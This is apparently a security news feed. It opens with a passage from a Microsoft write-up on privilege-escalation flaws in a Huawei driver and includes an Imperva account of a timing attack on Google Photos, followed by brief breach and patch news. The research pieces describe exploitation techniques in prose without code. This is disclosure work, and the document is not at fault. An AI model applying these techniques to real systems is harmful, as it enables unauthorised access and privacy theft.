The payload copied from kernel mode is divided into two portions: a shellcode (NormalRoutine) and a parameter block (NormalContext). At this point, the overall behavior looked suspicious enough for us to proceed with the hunting. Our goal was to incriminate the kernel code that triggered the alert.

Incriminating the source

In user-mode threats, the caller process context could shed light on the actor and link to other phases in the attack chain. In contrast, with kernel-mode threats, the story is more complicated. The kernel by nature is asynchronous; callbacks might be called in an arbitrary context, making process context meaningless for forensics purposes.

Therefore, we tried to find an indirect evidence to third-party code loaded into the kernel. By inspecting the machine timeline, we found that several third-party drivers were loaded earlier that day.

We concluded based on their file path that they are all related to an app from Huawei called PC Manager, a device management software for Huawei MateBook laptops. The installer is available on Huawei website, so we downloaded it for inspection. For each Huawei driver we used dumpbin.exe to examine imported functions.

And then we had a hit:

figure-03-dumpbin-utility-used-to-detect-user-APC injection-primitives

Figure 3. dumpbin utility used to detect user APC injection primitives

HwOs2Ec10x64.sys: Unexpected behavior from a driver

Hunting led us to the kernel code that triggered the alert. One would expect that a device management software would perform mostly hardware-related tasks, with the supplied device drivers being the communication layer with the OEM-specific hardware. So why was this driver exhibiting unusual behavior? To answer this question, we reverse-engineered HwOs2Ec10x64.sys.

Our entry point was the function implementing the user APC injection. We found a code path that:

  1. allocates RWX page in some target process;
  2. resolves CreateProcessW and CloseHandle function pointers in the address space of the target process;
  3. copies a code area from the driver as well as what seemed to be a parameter block to the allocated page; and
  4. performs User APC injection targeting that page

The parameter block contains both the resolved function pointers as well as a string, which was found to be a command line.

figure-04-User-APC-injection-code

Figure 4. User APC injection code

The APC normal routine is a shellcode which calls CreateProcessW with the given process command line string. This implied that the purpose of the code injection to services.exe is to spawn a child process.

figure-05-User-shellcode-performing-process-creation

Figure 5. User shellcode performing process creation

Inspecting the xrefs, we noticed that the injection code originated from a create-process notify routine when Create = FALSE. Hence, the trigger was some process termination.

But what command does the shellcode execute? Attaching a kernel debugger and setting a breakpoint on the memcpy_s in charge of copying the parameters from kernel to user-mode revealed the created process: one of Huawei’s installed services, MateBookService.exe, invoked with “/startup” in its command line.

figure-06-2-Breakpoint-hit-on-the-call-to-memcpy_s-copying-shellcode-parameters

Figure 6. Breakpoint hit on the call to memcpy_s copying shellcode parameters

Why would a valid service be started that way? Inspecting MateBookService.exe!main revealed a “startup mode” that revived the service if it’s stopped – some sort of watchdog mechanism meant to keep the Huawei PC Manager main service running.

figure-07-MateBookService-exe-startup-code-path

Figure 7. MateBookService.exe /startup code path

At this point of the investigation, the only missing piece in the puzzle was making sure the terminated process triggering the injection is indeed MateBookService.exe.

figure-08-Validating-terminated-process-identity

Figure 8. Validating terminated process identity

The code path that decides whether to inject to services.exe uses a global list of watched process names. Hitting a breakpoint in the iteration loop revealed which process was registered: it was MateBookService.exe, as expected, and it was the only process on that list.

figure-09-Breakpoint-hit-during-process-name-comparison-against-global-list

Figure 9. Breakpoint hit during process name comparison against global list

HwOs2Ec10x64.sys also provided process protection against external tampering. Any attempt to force MateBookService.exe termination would fail with Access Denied.

Abusing HwOs2Ec10x64.sys process watch mechanism

The next step in our investigation was to determine whether an attacker can tamper with the global watched process list. We came across an IOCTL handler that added an entry to that list. MateBookService.exe process likely uses this IOCTL to register itself when the service starts. This IOCTL is sent to the driver control device, created from its DriverEntry.

figure-10-HwOs2Ec10x64.sys-control-device-creation-with-IoCreateDevice

Figure 10. HwOs2Ec10x64.sys control device creation with IoCreateDevice

Since the device object is created with IoCreateDevice, Everyone has RW access to it. Another important observation was that this device isn’t exclusive, hence multiple handles could be opened to it.

Nevertheless, when we tried to open a handle to the device \\.\HwOs2EcX64, it failed with Last Error = 537, “Application verifier has found an error in the current process”. The driver was rejecting our request to open the device. How is access enforced? It must be on the CreateFile path; in other words, in HwOs2Ec10x64.sys IRP_MJ_CREATE dispatch routine.

figure-11-IRP_MJ_CREATE-dispatch-routine

Figure 11. IRP_MJ_CREATE dispatch routine

This function validates the calling process by making sure that the main executable path belongs to a whitelist (e.g., C:\Program Files\Huawei\PCManager\MateBookService.exe). This simple check on the initiating process name, however, doesn’t guarantee the integrity of the calling process. An attacker-controlled instance of MateBookService.exe will still be granted access to the device \\.\HwOs2EcX64 and be able to call some of its IRP functions. Then, the attacker-controlled process could abuse this capability to talk with the device to register a watched executable of its own choice. Given the fact that a parent process has full permissions over its children, even a code with low privileges might spawn an infected MateBookService.exe and inject code into it. In our proof-of-concept, we used process hollowing.

figure-12-Procmon-utility-results-showing-POC-process-start-exit-IL

Figure 12. Procmon utility results showing POC process start/exit & IL

Because watched processes are blindly launched by the watchdog when they’re terminated, the attacker-controlled executable would be invoked as a child of services.exe, running as LocalSystem, hence with elevated privileges.

figure-13-Procexp-utility-process-tree-view-showing-LPE_POC-running-as-LocalSystem

Figure 13. Procexp utility process-tree view showing LPE_POC running as LocalSystem

Responsible disclosure and protecting customers

Once we had a working POC demonstrating the elevation of privilege from a low-integrity attacker-controlled process, we responsibly reported the bug to Huawei through the Microsoft Security Vulnerability Research (MSVR) program. The vulnerability was assigned CVE-2019-5241. Meanwhile, we kept our customers safe by building a detection mechanism that would raise an alert for any successful privilege escalation exploiting the HwOs2Ec10x64.sys watchdog vulnerability as we described.

figure-14-2-Microsoft-Defender-ATP-alerting-on-the-privilege-escalation-POC-code

Figure 14. Microsoft Defender ATP alerting on the privilege escalation POC code

Abusing a second IOCTL handler

Having been able to freely invoke IOCTL handlers of the driver from user-mode, we looked for other capabilities that can be abused. We found one: the driver provided a capability to map any physical page into user-mode with RW permissions. Invoking this handler allowed a code running with low privileges to read-write beyond the process boundaries—to other processes or even to kernel space. This, of course, means a full machine compromise.

We also worked with Huawei to fix this second vulnerability, which was assigned CVE-2019-5242. Huawei addressed the flaw in the same security advisory: https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190109-01-pcmanager-en.

We presented our research at the Blue Hat IL Conference in February. Watch the video recording here, and get the slide deck here.

Summary

While the original alert turned out to be benign, in the sense that it didn’t detect an actual kernel threat like DOUBLEPULSAR, it did trigger an investigation that eventually led us to finding vulnerabilities. The two vulnerabilities we discovered in the driver prove the importance of designing software and products with security in mind. Security boundaries must be honored. Attack surface should be minimized as much as possible. In this case, the flaws could have been prevented if certain precautions were taken:

  • The device object created by the driver should be created with a DACL granting SYSTEM RW access (since only the vendor’s services were communicating directly with the driver)
  • If a service should persist, developers should check that it’s not already provided by the OS before trying to implement a complex mechanism
  • User-mode shouldn’t be allowed to perform privileged operations like writing to any physical page; if needed, the driver should do the actual writing for well-defined, hardware-related scenarios

Microsoft’s driver security checklist provides some guidelines for driver developers to help reduce the risk of drivers being compromised.

Our discovery of the driver vulnerabilities also highlights the strength of Microsoft Defender ATP’s sensors. These sensors expose anomalous behavior and give SecOps personnel the intelligence and tools to investigate threats, as we did.

Anomalous behaviors typically point to attack techniques perpetrated by adversaries with only malicious intent. In this case, they pointed to a flawed design that can be abused. Nevertheless, Microsoft Defender ATP exposed a security flaw and protected customers before it can even be used in actual attacks.

Not yet reaping the benefits of Microsoft Defender ATP’s industry-leading optics and detection capabilities? Sign up for free trial today.

 

 

Amit Rapaport (@realAmitRap)
Microsoft Defender Research team

The post From alert to driver vulnerability: Microsoft Defender ATP investigation unearths privilege escalation flaw appeared first on Microsoft Security.

Elsevier Exposed User Credentials Publicly Through Misconfigured Server

A popular publisher of scientific journals Elsevier has now joined the trail of firms that inadvertently breach users’ privacy. According

Elsevier Exposed User Credentials Publicly Through Misconfigured Server on Latest Hacking News.

2017 Cisco WebEx flaw increasingly leveraged by attackers, phishing campaigns rise

Network attacks targeting a vulnerability in the Cisco Webex Chrome extension have increased dramatically. In fact, they were the second-most common network attack, according to WatchGuard Technologies latest Internet Security Report for the last quarter of 2018. The vulnerability was first disclosed and patched in 2017 and attacks were almost non-existent in early 2018, but WatchGuard detections grew by over 7,000 percent from Q3 to Q4. Phishing campaigns The report also shows that phishing campaigns … More

The post 2017 Cisco WebEx flaw increasingly leveraged by attackers, phishing campaigns rise appeared first on Help Net Security.

Critical Vulnerabilities Found in Recently Released NSA Reverse Engineering Tool “Ghidra”

Earlier this month, NSA open-sourced Ghidra – its reverse engineering tool. Right after its release, researchers began discovering bugs in

Critical Vulnerabilities Found in Recently Released NSA Reverse Engineering Tool “Ghidra” on Latest Hacking News.

Medtronic defibrillators vulnerable to life threatening cyber attacks

By Waqas

Defibrillators are electronic devices manufactured to save the lives of people with life-threatening heart conditions such as Hypertrophic Cardiomyopathy (HCM). But now, according to the Department of Homeland Security (DHS), Medtronic defibrillators are vulnerable to cyber attacks allowing hackers to remotely control the device within “short-range access.” In total, 20 Medtronic products are vulnerable affecting over […]

This is a post from HackRead.com Read the original post: Medtronic defibrillators vulnerable to life threatening cyber attacks

Medtronic’s Implantable Defibrillators Vulnerable to Life-Threatening Hacks

The U.S. Department of Homeland Security Thursday issued an advisory warning people of severe vulnerabilities in over a dozen heart defibrillators that could allow attackers to fully hijack them remotely, potentially putting lives of millions of patients at risk. Cardioverter Defibrillator is a small surgically implanted device (in patients' chests) that gives a patient's heart an electric

E Hacking News – Latest Hacker News and IT Security News: Facebook Exposes Passwords of Hundreds of Millions of Its Users



A rather shocking vulnerability was uncovered by security researcher Brian Krebs, who reports that Facebook left the passwords of approximately 200 to 600 million users simply ‘stored’ in plain text.

A huge number of Facebook, Facebook Lite, and Instagram users may have had their passwords exposed as the aftereffect of a disturbing oversight by the social networking company.

Facebook just previously learned of the issue this past January and has since affirmed the shocking security failure, yet persists it has fixed the issue and has not discovered any proof that the data was 'abused.'

Albeit all users whose passwords were exposed will be informed, the 'shocking flaw' comes so far another blow to the already melting away trust of numerous Facebook users in the midst of the two years of consecutive privacy scandals.

The firm is as yet attempting to decide precisely the exact number of passwords which were exposed and to what extent, assures a source at Facebook who cautioned Krebs of the issue in the first place.

 ‘It’s so far unclear what caused some users’ passwords to be left exposed. To be clear, these passwords were never visible to anyone outside of Facebook and we have found no evidence to date that anyone internally abused or improperly accessed them, we estimate that we will notify hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users.'
            - Facebook released a public statement with Krebs' report and affirms that it revealed the plain text passwords amid a standard security review in January.

In any case while Facebook says no password reset is as such required, it will caution the users if their information has been abused or will be abused in any way, the security experts still recommend the users to change their current passwords.




E Hacking News - Latest Hacker News and IT Security News

Facebook Exposes Passwords of Hundreds of Millions of Its Users



A rather shocking vulnerability was uncovered by security researcher Brian Krebs, who reports that Facebook left the passwords of approximately 200 to 600 million users simply ‘stored’ in plain text.

A huge number of Facebook, Facebook Lite, and Instagram users may have had their passwords exposed as the aftereffect of a disturbing oversight by the social networking company.

Facebook just previously learned of the issue this past January and has since affirmed the shocking security failure, yet persists it has fixed the issue and has not discovered any proof that the data was 'abused.'

Albeit all users whose passwords were exposed will be informed, the 'shocking flaw' comes so far another blow to the already melting away trust of numerous Facebook users in the midst of the two years of consecutive privacy scandals.

The firm is as yet attempting to decide precisely the exact number of passwords which were exposed and to what extent, assures a source at Facebook who cautioned Krebs of the issue in the first place.

 ‘It’s so far unclear what caused some users’ passwords to be left exposed. To be clear, these passwords were never visible to anyone outside of Facebook and we have found no evidence to date that anyone internally abused or improperly accessed them, we estimate that we will notify hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users.'
            - Facebook released a public statement with Krebs' report and affirms that it revealed the plain text passwords amid a standard security review in January.

In any case while Facebook says no password reset is as such required, it will caution the users if their information has been abused or will be abused in any way, the security experts still recommend the users to change their current passwords.


Panic after hackers take control of emergency tornado alarms in Texas

By Waqas

On March 12th, at around 2:30 a.m., residents of two Texas towns panicked after hearing tornado alarm that went off until 4:00 a.m. They were disturbed because the alarms repeatedly went on and off for about one and a half hours, thanks to hackers – Finally, related authorities were able to turn them off. See: […]

This is a post from HackRead.com Read the original post: Panic after hackers take control of emergency tornado alarms in Texas

Flaw in NSA’s GHIDRA leads to remote code execution attacks

By Waqas

GHIDRA is NSA’s reverse engineering tool released earlier this month. Earlier this month, Hackread.com posted about the National Security Agency’s (NSA) publicly releasing its decompiler and disassembler tool GHIDRA and make it open-source software. Now, it has been revealed that the generic reverse engineering tool has a flaw that can be exploited by cybercriminals for carrying […]

This is a post from HackRead.com Read the original post: Flaw in NSA’s GHIDRA leads to remote code execution attacks

Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE!

Microsoft's products are still a leading source of exploitable security vulnerabilities used by hackers, according to a report by the firm Recorded Future.

The post Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE! appeared first on The Security Ledger.

Related Stories

When Is a Data Breach a Data Breach?

A data breach remains a common headline in the news cycle. A different company, website or social network reports a security issue almost daily. If it feels like using the internet has become a risky endeavor, the feeling is accurate. But what exactly classifies an event as a data breach? The world wide web is […]… Read More

The post When Is a Data Breach a Data Breach? appeared first on The State of Security.

Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed malicious websites to expose where, when, and with whom your photos were taken.

A now-patched vulnerability in the web version of Google Photos allowed  malicious websites to expose where, when, and with whom your photos were taken.

Background

One trillion photos were taken in 2018. With image quality and file size increasing, it’s obvious why more and more people choose to host their photos on services like iCloud, Dropbox and Google Photos.

One of the best features of Google Photos is its search engine. Google Photos automatically tags all your photos using each picture’s metadata (geographic coordinates, date, etc.) and a state-of-the-art AI engine, capable of describing photos with text, and detecting objects and events such as weddings, waterfalls, sunsets and many others. If that’s not enough, facial recognition is also used to automatically tag people in photos. You could then use all this information in your search query just by writing “Photos of me and Tanya from Paris 2018”.

The Threat

I’ve used Google Photos for a few years now, but only recently learned about its search capabilities, which prompted me to check for side-channel attacks. After some trial and error, I found that the Google Photos search endpoint is vulnerable to a browser-based timing attack called Cross-Site Search (XS-Search).

In my proof of concept, I used the HTML link tag to create multiple cross-origin requests to the Google Photos search endpoint. Using JavaScript, I then measured the amount of time it took for the onload event to trigger. I used this information to calculate the baseline time — in this case, timing a search query that I know will return zero results.

Next, I timed the following query “photos of me from Iceland” and compared the result to the baseline. If the search time took longer than the baseline, I could assume the query returned results and thus infer that the current user visited Iceland.

As I mentioned above, the Google Photos search engine takes into account the photo metadata. So by adding a date to the search query, I could check if the photo was taken in a specific time range. By repeating this process with different time ranges, I could quickly approximate the time of the visit to a specific place or country.

Attack Flow

The video below demonstrates how a 3rd-party site can use time measurements to extract the names of the countries you took photos in. The first bar in the video named “controlled” represents the baseline of an empty results page timing. Any time measurement above the  baseline indicates a non-empty result timing, i.e., the current user has visited the queried country.

For this attack to work, we need to trick a user into opening a malicious website while logged into Google Photos. This can be done by sending a victim a direct message on a popular messaging service or email, or by embedding malicious Javascript inside a web ad. The JavaScript code will silently generate requests to the Google Photos search endpoint, extracting Boolean answers to any query the attacker wants.

This process can be incremental, as the attacker can keep track of what has already been asked and continue from there the next time you visit one of his malicious websites.

You can see below the timing function I implemented for my proof of concept:

Below is the code I used to demonstrate how users’ location history can be extracted.

Closing Thoughts

As I said in my previous blog post, it is my opinion that browser-based side-channel attacks are still overlooked. While big players like Google and Facebook are catching up, most of the industry is still unaware.

I recently joined an effort to document those attacks and vulnerable DOM APIs. You can find more information on the xsleaks repository (currently still under construction).

As a researcher, it was a privilege to contribute to protecting the privacy of the Google Photos user community, as we continuously do for our own Imperva customers.

***

Imperva is hosting a live webinar with Forrester Research on Wednesday March 27 1 PM PT on the topic, “Five Best Practices for Application Defense in Depth.” Join Terry Ray, Imperva SVP and Imperva Fellow, Kunal Anand, Imperva CTO, and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy bolstered by real-time visibility to help security analysts distinguish real threats from noise can provide true protection for enterprises. Sign up to watch and ask questions live or see the recording!

The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

PuTTY Releases Important Software Update to Patch 8 High-Severity Flaws

The popular SSH client program PuTTY has released the latest version of its software that includes security patches for 8 high-severity security vulnerabilities. PuTTY is one of the most popular and widely used open-source client-side programs that allows users to remotely access computers over SSH, Telnet, and Rlogin network protocols. Almost 20 months after releasing the last version of

New Hacking Method Extracts BitLocker Encryption Keys

A researcher has found a new attack method that can extract BitLocker encryption keys. As a result, the attack puts

New Hacking Method Extracts BitLocker Encryption Keys on Latest Hacking News.

Denial of Service vulnerability discovered in Triconex TriStation Software Suite Emulator

Applied Risk ICS Security Consultant Tom Westenberg discovered a DoS vulnerability in an emulated version of the Triconex TriStation Software Suite. Triconex is a Schneider Electric brand which supplies systems and products in regards to critical control and industrial safety-shutdown technology. The Triconex Emulator is software that allows users to emulate and execute TriStation 1131 applications without connecting to a Tricon, Trident, or Tri-GP controller. Using the Emulator, users can test applications in an offline … More

The post Denial of Service vulnerability discovered in Triconex TriStation Software Suite Emulator appeared first on Help Net Security.

Libssh Releases Update to Patch 9 New Security Vulnerabilities

Libssh2, a popular open source client-side C library implementing the SSHv2 protocol, has released the latest version of its software to patch a total of nine security vulnerabilities. The Libssh2 library is available for all major distributors of the Linux operating systems, including Ubuntu, Red Hat, Debian, and also comes bundled within some distributions and software as a default library

39% of Counter Strike 1.6 Servers Found to be Delivering Malware

It has been roughly two decades since the launch of Counter Strike. Yet, the game continues to be popular among

39% of Counter Strike 1.6 Servers Found to be Delivering Malware on Latest Hacking News.

Hackers are using 19-year-old WinRAR bug to install nasty malware

By Waqas

By using the bug, hackers are desperately dropping persistent malware through generic trojan on systems using the old version of WinRar. McAfee security firm’s researcher Craig Schmugar has identified that the world famous and commonly used compression software WinRar is plagued with code execution vulnerability for the past nineteen years. Resultantly, over 100 exploits have surfaced that […]

This is a post from HackRead.com Read the original post: Hackers are using 19-year-old WinRAR bug to install nasty malware

Adobe March Patch Tuesday Brings Fixes For Photoshop And Digital Editions Bugs

Adobe has released the scheduled monthly update bundle for its products. This Adobe March Patch Tuesday addressed critical vulnerabilities in

Adobe March Patch Tuesday Brings Fixes For Photoshop And Digital Editions Bugs on Latest Hacking News.

Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates

Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide. Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks. The critical

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs

The scheduled Microsoft March Patch Tuesday update bundle has rolled-out. This update bundle also addresses numerous security flaws. In addition,

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs on Latest Hacking News.

Online training site says it is spamming insecure printers with adverts

Online training site says it is spamming insecure printers with adverts

Online training site Skillbox says that it has come up with an imaginative way to reach out to potential clients, and invite them to change their careers from being accountants and become graphical designers instead.

The Russian firm’s idea? To send a spam message to thousands of printers left open to the internet.

Is this really happening again?

Pakistani Govt’s passport application tracking site hacked with Scanbox framework

By Waqas

Hackers are after anyone seeking Pakistani passport while there is no response from the website’s administrator. Researchers at information security firm Trustwave have made a startling new discovery about data breach on a Pakistani government website involving the Scanbox Framework. It is worth noting that the Scanbox is a dangerous payload and this is the […]

This is a post from HackRead.com Read the original post: Pakistani Govt’s passport application tracking site hacked with Scanbox framework

What you need to know for Patch Tuesday, March 2019

By SophosLabs Offensive Security Research Microsoft released their monthly security updates for March this past Tuesday. This month’s fixes address 64 vulnerabilities that affect Windows and a range of software that runs on Windows, mainly the Internet Explorer and Edge browsers. In addition, there was a patch released for one critical vulnerability in Adobe Flash. […]

Understanding Vulnerability Scoring to Help Measure Risk

Understanding vulnerability scoring can be a daunting task, but a good starting point is first understanding risk and being able to distinguish risk from a vulnerability. Both have been used interchangeably throughout the years. A vulnerability is some aspect of a systems functioning, configuration or architecture that makes the resource a target of potential misuse, […]… Read More

The post Understanding Vulnerability Scoring to Help Measure Risk appeared first on The State of Security.

Microsoft Releases Patches for 64 Flaws — Two Under Active Attack

It's time for another batch of "Patch Tuesday" updates from Microsoft. Microsoft today released its March 2019 software updates to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. The update addresses flaws in Windows, Internet Explorer, Edge, MS

Vulnerability Spotlight: Privilege escalation bug in CleanMyMac X’s helper service


Tyler Bohan of Cisco Talos discovered this vulnerability.

Executive summary

CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw. The application scans through the system and user directories looking for unused and leftover files and applications.

In accordance with our coordinated disclosure policy, Cisco Talos worked with MacPaw to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

CleanMyMac X incomplete update patch privilege escalation vulnerability (TALOS-2018-0759/CVE-2019-5011)

An exploitable privilege escalation vulnerability exists in the helper service CleanMyMac X, version 4.20, due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. A user with local access can use this vulnerability to modify the file system as root. An attacker would need local access to the machine for a successful exploit.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 4.20 of CleanMyMac X is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48297, 48298

Multiple Adobe Sandbox Vulnerabilities Risked Integrity And Confidentiality Of Systems

One of the areas contributing to the rise of cyber attacks is the use of third-party services. While these services

Multiple Adobe Sandbox Vulnerabilities Risked Integrity And Confidentiality Of Systems on Latest Hacking News.

A week in security (March 4 – 11)

Last week, Malwarebytes Labs released its in-depth, international data privacy survey of nearly 4,000 individuals, revealing that every generation, including Millennials, cares about online privacy. We also covered a novel case of zombie email that involved a very much alive account user, delved into the typical data privacy laws a US startup might have to comply with on its journey to success, and spotlighted the Troldesh ransomware, also known as “Shade.”

Other security news

Stay safe, everyone!

The post A week in security (March 4 – 11) appeared first on Malwarebytes Labs.

Verifications.io breach: Database with 2 billion records leaked

By Waqas

Verifications.io breach is one of the largest data breaches but the good news is that it does not involve passwords. Another day, another data breach; this time the email validation service Verifications.io has leaked a humongous database containing personal and sensitive records of more than 2 billion individuals around the world. Verifications.io breach – What happened It […]

This is a post from HackRead.com Read the original post: Verifications.io breach: Database with 2 billion records leaked

Facebook Messenger vulnerability exposed your private texts




A new security flaw in the web version of Facebook Messenger could be allowing any website to see the names of people to whom you have been texting.

The security researcher Ron Masas from Imperva, an online privacy monitoring website, reported the vulnerability as “Cross-Site Frame Leakage” (CSFL)—a side-channel attack,  performed on an end user’s web browser', which was first spotted in November.

“As happens with applications I regularly use, I felt the need to understand how Facebook Messenger works,” Masas wrote in a blog post.

The flaw exploits an element called 'iframe', it is used to see notice whether a user is active or passive on the Facebook messenger.

“I started poking around the Messenger Web application and noticed that iFrame elements were dominating the user interface,” he continued. “The chat box, as well as the contact list, were rendered in iFrames, opening the possibility for a CSFL attack.”

"This lets an attacker reliably distinguish between the full and empty states. This could let him remotely check if the current user has chatted with a specific person or business, which would violate those users’ privacy.'

'By recording the frame count data over time, I found two new ways to leak cross-origin information.

'By looking at patterns instead of a static number, I was able to leak the “state” of a cross-origin window.'

Facebook messenger has now removed all the active iFrames from its website.

'The bug is a browser issue related to how they handle content embedded in webpages and could affect any site, not just Messenger.com,' a Facebook spokesperson told MailOnline.

'We already fixed the issue for Messenger.com last year to safeguard our users and made recommendations to browser makers to prevent this type of issue from happening.'

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of largescale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Google Chrome zero-day: Now is the time to update and restart your browser

It’s not often that we hear about a critical vulnerability in Google Chrome, and perhaps it’s even more rare when Google’s own engineers are urging users to patch.

There are several good reasons why you need to take this new Chrome zero-day (CVE-2019-5786) seriously. For starters, we are talking about a full exploitation that escapes the sandbox and leads to remote code execution. This in itself is not an easy feat, and is usually observed only sporadically, perhaps during a Pwn2Own competition. But this time, Google is saying that this vulnerability is actively being used in the wild.

According to Clément Lecigne, the person from Google’s Threat Analysis Group who discovered the attack, there is another zero-day that exists in Microsoft Windows (yet to be patched), suggesting the two could be chained up for even greater damage.

If you are running Google Chrome and its version is below 72.0.3626.121, your computer could be exploited without your knowledge. While it’s true that Chrome features an automatic update component, in order for the patch to be installed you must restart your browser.

This may not seem like a big deal but it is. Another Google engineer explains why this matters a lot, in comparison to past exploits:

Considering how many users keep Chrome and all their tabs opened for days or even weeks without ever restarting the browser, the security impact is real.

Some might see a bit of irony with this latest zero-day considering Google’s move to ban third-party software injections. Many security programs, including Malwarebytes, need to hook into processes, such as the browser and common Office applications, in order to detect and block exploits from happening. However, we cannot say for sure whether or not this could prevent the vulnerability from being exploited, since few details have been shared yet.

In the meantime, if you haven’t done so yet, you should update and relaunch Chrome; and don’t worry about your tabs, they will come right back.

The post Google Chrome zero-day: Now is the time to update and restart your browser appeared first on Malwarebytes Labs.

Cyber Security Week in Review (March 8)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
  • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
  • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s largely believed one of the most sophisticated decompilers available. 

From Talos

  • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it’s become more important now than ever to secure them. You can watch a replay of the address here
  • There are three vulnerabilities in Pixar Renderman that could allow an attacker to elevate their privileges to root. Renderman is a rendering application used in animation and film production produced by Pixar, a well-known film studio. When installing the application, a helper tool is installed and launched as root. This service continues to listen even after installation is complete. These vulnerabilities lie in the `Dispatch` function of this helper tool.

Malware roundup

  • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it has numerous layers to it and acts as a downloader to several other malicious programs. 
  • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order attacks.
  • “Scarlett Widow,” a hacking group believed to be based out of Nigeria, recently started a new wave of attacks. The actor has sent several malicious to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to have information on 30,000 individuals from 13,000 organizations across 13 different countries. 

The rest of the news

  • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
  • U.S. Cyber Command carried out an offensive operation against a U.S. Russian troll farm last year. The attack targeted hacking groups known for spreading misinformation, specifically trying to shut them down on the day of the 2018 midterm elections in the U.S. 
  • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


Vulnerabilities in Two Smart Car Alarm Systems Affected 3M Vehicles

Two smart car alarm systems suffered from critical security vulnerabilities that affected upwards of three million vehicles globally. Researchers at Pen Test Partners independently assessed the security of products developed by Viper and Pandora, two of the world’s largest and most well-known vendors of smart car alarms. With both systems, they found insecure direct object […]… Read More

